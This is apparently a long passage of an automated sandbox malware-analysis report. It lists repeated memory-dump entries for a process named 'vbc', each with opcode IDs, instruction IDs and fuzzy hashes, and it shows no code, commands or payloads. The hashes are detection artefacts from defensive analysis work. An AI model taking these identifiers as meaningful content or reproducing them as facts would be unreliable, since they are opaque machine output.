                                                                                                                                                  • Instruction ID: 988c263df74a8b2100bd003d86828c0097019023a51c0c7f9ff38849e30d045f
                                                                                                                                                  • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                                  • Instruction Fuzzy Hash: 8F519B71E0461AABCF1ADF94C4C4BEEBBB9AF45354F14446AE901AB240D734DE44CBA1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4c51ff380b117684fd422a586b24ce8c5f3297f7a6bd2ecd7a7d75732c64dd51
                                                                                                                                                  • Instruction ID: 0657f4abab1f7df781ecb4d8fd53ee3279db9ac53915acc2c309446e64269696
                                                                                                                                                  • Opcode Fuzzy Hash: 4c51ff380b117684fd422a586b24ce8c5f3297f7a6bd2ecd7a7d75732c64dd51
                                                                                                                                                  • Instruction Fuzzy Hash: F75136716083419FCB58DF29C881A6BB7E6BFC8618F444E2EF495C7250EB30DA05CB56
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4dc9b024d64ed519c70cf2afc7c743cd47fa25b933d84184e60926ee3c9b7408
                                                                                                                                                  • Instruction ID: 8df162095c6dde2a8aafc7598a16a19a7ed2570bee7c19ea6a343ab0556687a4
                                                                                                                                                  • Opcode Fuzzy Hash: 4dc9b024d64ed519c70cf2afc7c743cd47fa25b933d84184e60926ee3c9b7408
                                                                                                                                                  • Instruction Fuzzy Hash: 4A518D71A08345AFC700DF29D889A6BB7E9FF88254F144C6EF895C7291D734D905CB92
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 25e229cc6dedc6696e46cda5420205be3540dc32ff0a1b19df06e2b190888cda
                                                                                                                                                  • Instruction ID: 12046c7aa33570dc124e8235175298bc08b526f8d3a2bb358b690e0bc46d5940
                                                                                                                                                  • Opcode Fuzzy Hash: 25e229cc6dedc6696e46cda5420205be3540dc32ff0a1b19df06e2b190888cda
                                                                                                                                                  • Instruction Fuzzy Hash: 6951F475A08649AFCF19DF68C88AB7DBBB2FB48714F140D2AE842A3280D334DD50C795
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 587df90024d84035b02dee61ba3459ecf6fb593167b122780c72badd308a8420
                                                                                                                                                  • Instruction ID: 8204c92de0ead752838ccbad4cf426f2415512bd7bec8cf94f2503585618f5d4
                                                                                                                                                  • Opcode Fuzzy Hash: 587df90024d84035b02dee61ba3459ecf6fb593167b122780c72badd308a8420
                                                                                                                                                  • Instruction Fuzzy Hash: A251F43060420FDBEF24CE29C584B7677AAFB42255F188D2EE807CAA50D771CE91DB52
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 13c96b297fc490ef313c90e01b9e3c6952fb4b6ec5d0028fd3dc8440fece5e87
                                                                                                                                                  • Instruction ID: d3eb3f86409714be430cd07538f87f30b64d6c19f7bfcfbccd575536a87f775c
                                                                                                                                                  • Opcode Fuzzy Hash: 13c96b297fc490ef313c90e01b9e3c6952fb4b6ec5d0028fd3dc8440fece5e87
                                                                                                                                                  • Instruction Fuzzy Hash: E241DF36A04218DBCB14DFA8C448AEEF7B5FF48710F14896AE816F7A50D734AD41CBA4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                                  • Instruction ID: 3f4434c9133fe9a5962b6d18cfd866c1295a50507a75c4479b8b235f6853e4ed
                                                                                                                                                  • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                                  • Instruction Fuzzy Hash: 3E517C75A00219DFDB14CF99C980AADF7B2FF84710F2485A9D855A7350D770EE41CB90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a0cecdcc476482deb1704f45119489220928943c7c5790f62bcb48f86943c7e3
                                                                                                                                                  • Instruction ID: 373cc2580331f2a44af302ad213a3611f69a01f96e065b497101fb4343bf2916
                                                                                                                                                  • Opcode Fuzzy Hash: a0cecdcc476482deb1704f45119489220928943c7c5790f62bcb48f86943c7e3
                                                                                                                                                  • Instruction Fuzzy Hash: 2F510571A04106ABDB35CB68CC09FB8BBB2FF06318F144AA5D516A72C0DB349AC1DF81
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 507ac1a9c7607ee6fc30b6aadba73e767ca5fbd9138df4b3a3886b8290e89087
                                                                                                                                                  • Instruction ID: 46f0e5a337264a55f4f977fd75a800e6197296b143566af9337244674447a20c
                                                                                                                                                  • Opcode Fuzzy Hash: 507ac1a9c7607ee6fc30b6aadba73e767ca5fbd9138df4b3a3886b8290e89087
                                                                                                                                                  • Instruction Fuzzy Hash: 4941F571B403149FEB25DF64CC89F7AB7AABB45614F004CAAE985AB280D774EE40CF51
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                                  • Instruction ID: 8f805075e3ca0213fe2a096d15a5a71b33c42396bdc76c74af816a83e0666c62
                                                                                                                                                  • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                                  • Instruction Fuzzy Hash: 5941B575B00215ABDB15DF99CC84BBFB7BAFF88600F55506AE801A7385D670DD04DB60
                                                                                                                                                  Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9432ec6e7d9d4822344a3bb2279dfdd0dcaa48393804524a066d60e99b82f43e
• Instruction ID: a92b4f438ad632143bf12fd25c467340660344e74a9910699655f51bba8e4365
• Opcode Fuzzy Hash: 9432ec6e7d9d4822344a3bb2279dfdd0dcaa48393804524a066d60e99b82f43e
• Instruction Fuzzy Hash: 8041C032A48615CFCF14DF68C899BAD7BB5FB04364F180966E412BB391DB34DA40CBA4

Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
• Instruction ID: e63c3cc8d47398106ac3f94a34b208def4561629212d71f00c811441564d7851
• Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
• Instruction Fuzzy Hash: EB413E39B0C219FBDF14DE55984DBB9B762FB40758F1588AAE8868B240D6318F50D790

Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
• Instruction ID: 77e97194078f0e48c0158e283b50501bf15a3c81122c0d0789f102d6549309ed
• Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
• Instruction Fuzzy Hash: 67413F75A04709EFDB24CF99C988AAAB7F5FF08700B10496DE556E7A50D730EA44CF50

Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 48adcbfebc1f5cc3e072e55490f7b6b3b026bf38815c1f7d1f6260933bbf59e8
• Instruction ID: c7e7fbe1dd6e73dcc8e722d734f25c53c3e92892303841d31d2d7ce85f4a0bc3
• Opcode Fuzzy Hash: 48adcbfebc1f5cc3e072e55490f7b6b3b026bf38815c1f7d1f6260933bbf59e8
• Instruction Fuzzy Hash: 5241A175A01704DFCB25EF65C946E65B7B2FF49320F1089AAE4069B2A0DB30AA81DF51

Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ace9390c364655a9fa579196c0c084bf9b5a7773966da315fb3ec5e2822c4535
• Instruction ID: b29af8062c9a3edae206a49c65e13c7b1d82451ec3799d6de258d9e948e2045d
• Opcode Fuzzy Hash: ace9390c364655a9fa579196c0c084bf9b5a7773966da315fb3ec5e2822c4535
• Instruction Fuzzy Hash: 81419272608651DFC321DF69C844A6EB7A5FFC8740F140A5DF89597680E730E904C7A5

Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d28f0831c77500ed9da537c4ba0f8c91bc03cfe67e8bd3f3fe442718ad855f56
• Instruction ID: c03e3270ab2b25ca071b6d4140963f857a19f6cf99d4fbf6ef3bbccbfa010163
• Opcode Fuzzy Hash: d28f0831c77500ed9da537c4ba0f8c91bc03cfe67e8bd3f3fe442718ad855f56
• Instruction Fuzzy Hash: 71410371E06619EFCB00DF15C841AA8B7B2FF44760F248A29E816A7290D734EE41DBD0

Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cd2fb11dbef3c8cb35ba34b63222c4a75064569b7719f61626a9001ac385ae66
• Instruction ID: 63268245bbfc75630c359688c117409aab1fe74dd6311c06f56b03075c68b475
• Opcode Fuzzy Hash: cd2fb11dbef3c8cb35ba34b63222c4a75064569b7719f61626a9001ac385ae66
• Instruction Fuzzy Hash: 2C310971A062099FCB20DF59C841AAEB7F2FF98724F244D2EE456A7250CB34AD01DB80

Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e729da54dc25dd8546914e7f3dda643b8a10e149bf476ba3d4032f0c36384f79
• Instruction ID: 9408b4f6e934f275022fd348711626f107c9ee80dcf9da4a050f5c176a490f31
• Opcode Fuzzy Hash: e729da54dc25dd8546914e7f3dda643b8a10e149bf476ba3d4032f0c36384f79
• Instruction Fuzzy Hash: 70419E36715A06EFDB16DF29C888F6ABBA6FF85340F044855E80287651CB74E960CF90

Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
• Instruction ID: 9732dc666908a88a39ac648f386e91c8ab54d34c5e315c75e8334fae18398b09
• Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
• Instruction Fuzzy Hash: 00311A32604244AFDB11CBA9CC88FAABFE9FF04364F044965E855E7352C774D984CB94

Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c788e0255c15aad72b0913b719b01b796bd9a4b3bc3ea783cc1be8ba0e65d5f6
• Instruction ID: 6d4e3a51d5f939c6c311596b520de0299c2cf4b828e1128dc4e0af7d7eb781b1
• Opcode Fuzzy Hash: c788e0255c15aad72b0913b719b01b796bd9a4b3bc3ea783cc1be8ba0e65d5f6
• Instruction Fuzzy Hash: E931C835750745ABD722AFD98C85F6B77B9EF48B94F000828F600AB391DAA4DD40D7E0

Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 416c9de0faba5d52714ed624698a22868f5543d51428ad4cd402531de0a549d6
• Instruction ID: 96ccd5bda17a5cae80b8fa3abdec5e98bdc21ad3b38842c4bee72de047bfa476
• Opcode Fuzzy Hash: 416c9de0faba5d52714ed624698a22868f5543d51428ad4cd402531de0a549d6
• Instruction Fuzzy Hash: C241DF32200B469FCB26CF28C488FAA7BE5BB45794F144D29E95A9B250D774E800DB50

Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: f7347ad76c9c86dc65c89daed89238317501206b72f65cd682cfb8c4669e39ed
• Instruction ID: 9a2651a2db9f4d5e929fc75b5241b52f7c8aff467febb1a889e782b0e21b8194
• Opcode Fuzzy Hash: f7347ad76c9c86dc65c89daed89238317501206b72f65cd682cfb8c4669e39ed
• Instruction Fuzzy Hash: DF31B272209345AFD726DA24C849E6BB7E8EF80660F044D7DF891A7250E6B0ED05CBE1

Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 500970041154d72cc3eec4c32e4c4d3148a704368f339176876c4475bb78c66a
• Instruction ID: e1c50fe6a24c28005a20235c4b091ef47ff5bb905a6527444cb4353032c73b09
• Opcode Fuzzy Hash: 500970041154d72cc3eec4c32e4c4d3148a704368f339176876c4475bb78c66a
• Instruction Fuzzy Hash: B1310475A00216AFDB15DFA8CC80FBEB3B5FB44B44F014569E800AB284D770EC40CBA4

Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: adbdd58b32c30a69edce5f7526da03b4219de822da7b61be7943ad01063b2109
• Instruction ID: ad75c0206975843d1df4cfdbe9c84c968dda98f261b52be6c8507a5402102c40
• Opcode Fuzzy Hash: adbdd58b32c30a69edce5f7526da03b4219de822da7b61be7943ad01063b2109
• Instruction Fuzzy Hash: DE31D432A44615DBC712DE288988E6BBBA6AFD4660F014D29FE55BB310DA30DC01DBD1

Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 482646ad6206645084597511a71f65cbbea9d073b0547a7b96d9b69204f1618f
• Instruction ID: 62b5cee6f84ae9ede407db47ded151698ca9094b3ab90152cb395ef05b80bd3c
• Opcode Fuzzy Hash: 482646ad6206645084597511a71f65cbbea9d073b0547a7b96d9b69204f1618f
• Instruction Fuzzy Hash: A231F131B41601AFDB12DFA8CC50BAEB7BAEF44754F00046AE501DB391DA70DC40DB91

Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 72f4b02ce1f3d5bc6b9412c58d62bad0ba34a38fc1eb48827aa433d9eabdf3f4
                                                                                                                                                  • Instruction ID: b971be8f2a45d582491811532cddcafabf7eba23175c3cc2183e9c8d1c26cacc
                                                                                                                                                  • Opcode Fuzzy Hash: 72f4b02ce1f3d5bc6b9412c58d62bad0ba34a38fc1eb48827aa433d9eabdf3f4
                                                                                                                                                  • Instruction Fuzzy Hash: 8D319A766093528FE320CF19C840B2BBBE5FB88B04F054D6EE8869B251D774EA44CB91
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 06c957b018cb75e5950df1d26198f3a862220a77acdbfc89b7dbe3f35174ed4f
                                                                                                                                                  • Instruction ID: 2f1d22ed657a2f298c7a3043b5c4877b540c9e5b4a02d7bbff03d30ad889e2ef
                                                                                                                                                  • Opcode Fuzzy Hash: 06c957b018cb75e5950df1d26198f3a862220a77acdbfc89b7dbe3f35174ed4f
                                                                                                                                                  • Instruction Fuzzy Hash: 5F319575A011299BDB30DF69CC88FAFBBB9FF44644F0508A6E909E7210D6349F80CB91
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                                  • Instruction ID: 12ffc62dae8c6b5b8e0d8ceb4ea05ca824c327fb366ed05f11b26b76b9b37ff6
                                                                                                                                                  • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                                  • Instruction Fuzzy Hash: 6F313A72B04B04AFD764CF6ACD40B6BB7F9BB08A50F040D6DA59AC3A50E670E900CB60
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 04898e83b0775e8c8ce4b8676b5db9bb0e30d43122f6bd859fd266f77d304529
                                                                                                                                                  • Instruction ID: 444f0ec09dde455469c789c980e96140fd7ab705b5eef98220e3bd1d069c5024
                                                                                                                                                  • Opcode Fuzzy Hash: 04898e83b0775e8c8ce4b8676b5db9bb0e30d43122f6bd859fd266f77d304529
                                                                                                                                                  • Instruction Fuzzy Hash: 2731C432B042059FCB18EFA9C9C5A7EBBF9EB84708F00892AD446D7654E730EE41CB50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e0379140f848055d4cbb965a6304bef6c8d0890b34ea2a766527a335f586c14d
                                                                                                                                                  • Instruction ID: 5c2775f90685a3475101915813cf0d90a65c1001703027f06a532cd6744abfc8
                                                                                                                                                  • Opcode Fuzzy Hash: e0379140f848055d4cbb965a6304bef6c8d0890b34ea2a766527a335f586c14d
                                                                                                                                                  • Instruction Fuzzy Hash: 4831C532A0152C9BDB35DF54CC46FEE77BEFB05790F0109A1E645A7290D6B4AE809F90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 497dadffa3c3ae43c3f373601e61f4ed9897ef7ac93dd6d1e8b6f24e238377ec
                                                                                                                                                  • Instruction ID: 3f558c2ab5641fcb2a5881675f3c646cb8c04a9cc6369509bc3e38130b7b019f
                                                                                                                                                  • Opcode Fuzzy Hash: 497dadffa3c3ae43c3f373601e61f4ed9897ef7ac93dd6d1e8b6f24e238377ec
                                                                                                                                                  • Instruction Fuzzy Hash: EE3159B96002009BCB25AF28CC49B7977B5FF40314F9489A9ED47AB345DE34DAC2CB94
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                                  • Instruction ID: b88e872bbad3a05f6a48228ebf81be11cf380b71283fdb5311149b8fbe463cca
                                                                                                                                                  • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                                  • Instruction Fuzzy Hash: 76216D36704659B6CB15AB94CC04EBBBBB4EF50710F409C1AFAA587690E638DD40D3A0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                                                  • Instruction ID: 73150402a4e4712df656b5129a7f08cc19c555c2a036dcd51ce30954308756e6
                                                                                                                                                  • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                                                  • Instruction Fuzzy Hash: C5218D36A00608ABCF19CF98C9C4A9EBBA5FF48314F108869ED159B641D670EE45CB94
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: bdf26f521a1645a76ab74b672af8ce9565f4aa3ec431e202ca6175574afce0be
                                                                                                                                                  • Instruction ID: a111797b41b9ec5df39429626c0c3ca704f85e4a5553b0e59e3c6174fd14fe8d
                                                                                                                                                  • Opcode Fuzzy Hash: bdf26f521a1645a76ab74b672af8ce9565f4aa3ec431e202ca6175574afce0be
                                                                                                                                                  • Instruction Fuzzy Hash: 9A21C1726087499BCB26DF58C880B6BB7E5FF88B60F044D19FC559B640D770EA01CBA2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 420bceea9b3a8642c40bcbc749e43db97c3f076c07bea8d4594b144c61cab2c2
                                                                                                                                                  • Instruction ID: 1a370b8182841aec3a542475bdec7c67bc363119cd1b357ba3d66997d61e6819
                                                                                                                                                  • Opcode Fuzzy Hash: 420bceea9b3a8642c40bcbc749e43db97c3f076c07bea8d4594b144c61cab2c2
